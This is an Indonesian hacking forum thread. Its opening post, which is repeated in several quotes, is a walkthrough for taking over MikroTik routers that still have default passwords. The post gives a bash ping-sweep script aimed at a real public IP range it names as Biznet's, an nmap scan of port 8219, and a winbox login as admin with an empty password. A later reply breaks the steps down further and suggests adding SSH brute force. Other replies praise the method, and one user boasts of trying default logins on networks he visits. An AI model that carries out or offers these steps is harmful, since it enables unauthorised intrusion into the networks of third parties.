Sebuah Kesalahan Network Administrator
#1
seorang network adminsitrator tidak seharusnya membiarkan mikrotik dengan default password....
walkthrough :

mencoba mencari target host yg hidup:
root@bt~#nano pingips.sh

Code:
#!/bin/bash
for ip in `seq 1 254`;do
ping -c 1 118.99.81.$ip | grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
root@bt~#chmod 755 pingips.sh
root@bt~#./pingips.sh > ip.txt
root@bt~#nmap -iL ip.txt -p 8219

setelah beberapa menit dan mencoba ip yg hdup dengan winbox

root@bt~#wine winbox
user : admin
pass :

[Image: MyScreenshot.png]

:badpc:
Hacking isn't just Computers & Exploits. It's a Philosophy.

#2
(10-16-2011, 02:54 AM)nasa Wrote: seorang network adminsitrator tidak seharusnya membiarkan mikrotik dengan default password....
walkthrough :

mencoba mencari target host yg hidup:
root@bt~#nano pingips.sh

Code:
#!/bin/bash
for ip in `seq 1 254`;do
ping -c 1 118.99.81.$ip | grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
root@bt~#chmod 755 pingips.sh
root@bt~#./pingips.sh > ip.txt
root@bt~#nmap -iL ip.txt -p 8219

setelah beberapa menit dan mencoba ip yg hdup dengan winbox

root@bt~#wine winbox
user : admin
pass :

[Image: MyScreenshot.png]

:badpc:

mantappppsss om.... kudu di coba nih... tapi saya msih pengguna baru om.. bisa ksih tutorial yg lbih det*** lg om... hehehehehe (junk nih) mf om.. mklum yah... Smile Smile Smile

#3
(10-16-2011, 10:32 AM)Liyan Oz Wrote:
(10-16-2011, 03:05 AM)betefive Wrote:
(10-16-2011, 02:54 AM)nasa Wrote: seorang network adminsitrator tidak seharusnya membiarkan mikrotik dengan default password....
walkthrough :

mencoba mencari target host yg hidup:
root@bt~#nano pingips.sh

Code:
#!/bin/bash
for ip in `seq 1 254`;do
ping -c 1 118.99.81.$ip | grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
root@bt~#chmod 755 pingips.sh
root@bt~#./pingips.sh > ip.txt
root@bt~#nmap -iL ip.txt -p 8219

setelah beberapa menit dan mencoba ip yg hdup dengan winbox

root@bt~#wine winbox
user : admin
pass :

[Image: MyScreenshot.png]

:badpc:

mantappppsss om.... kudu di coba nih... tapi saya msih pengguna baru om.. bisa ksih tutorial yg lbih det*** lg om... hehehehehe (junk nih) mf om.. mklum yah... Smile Smile Smile

iyo bagusnya gtu Big Grin tapi kalau ngerepotin jangan pak heeehe

terlalu dasar dan terlalu fatal
root@IBTeam# loe.gw ^C

#4
(10-16-2011, 03:05 AM)betefive Wrote:
(10-16-2011, 02:54 AM)nasa Wrote: seorang network adminsitrator tidak seharusnya membiarkan mikrotik dengan default password....
walkthrough :

mencoba mencari target host yg hidup:
root@bt~#nano pingips.sh

Code:
#!/bin/bash
for ip in `seq 1 254`;do
ping -c 1 118.99.81.$ip | grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
root@bt~#chmod 755 pingips.sh
root@bt~#./pingips.sh > ip.txt
root@bt~#nmap -iL ip.txt -p 8219

setelah beberapa menit dan mencoba ip yg hdup dengan winbox

root@bt~#wine winbox
user : admin
pass :

[Image: MyScreenshot.png]

:badpc:

mantappppsss om.... kudu di coba nih... tapi saya msih pengguna baru om.. bisa ksih tutorial yg lbih det*** lg om... hehehehehe (junk nih) mf om.. mklum yah... Smile Smile Smile


detailnya:

1. buat sebuah file bash bernama pingips.sh d sini ane pake nano:
root@boot~# nano pingips.sh

2. isi file pingips.sh :
Code:
#!/bin/bash
for ip in `seq 1 254`;do
ping -c 1 118.99.81.$ip | grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done

3. artinya script ini akan mencoba melakukan ping sebanyak 1 kali mulai dari ip
118.99.81.1 sampai 118.99.81.254 --> ip public biznet , kemudian hanya menampilkan ip yg hidup..

4. buat jadi executable
root@bt~# chmod 755 pingips.sh

5. kemudian jalankan dan simpan hasilnya ke file bernama ip.txt
root@bt~# ./pingips.sh > ip.txt

6. scan port 8219 pada ip yg hidup dengan nmap (8219 default port untuk winbox)
root@bt~# nmap -iL ip.txt -p 8219 -v

7. buka winbox dan coba konek ke target..
root@bt~# wine winbox

8. masukkan ip target, user, password dan konek

9. berdoa semoga msh default....

nb: serangan ini bisa di kombinasikan dengan tutorial brute force ssh mikrotik yg pernah di tulis ama om zee.





Hacking isn't just Computers & Exploits. It's a Philosophy.

#5
thanks share kk....

#6
keterlaluan klo masih ada admin jaringan yang membiarkan password secara default...ckckck ... tapi memang masih banyak sih orang yang keterlaluan hahahaha

#7
bahaya wkwkwk . . .
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#8
ane juga masih sering nemu kk...kalo dateng ke tempat2 asing, iseng2 suka coba masukin user&passwd default,eh ternyata masuk Big Grin






Users browsing this thread: 1 Guest(s)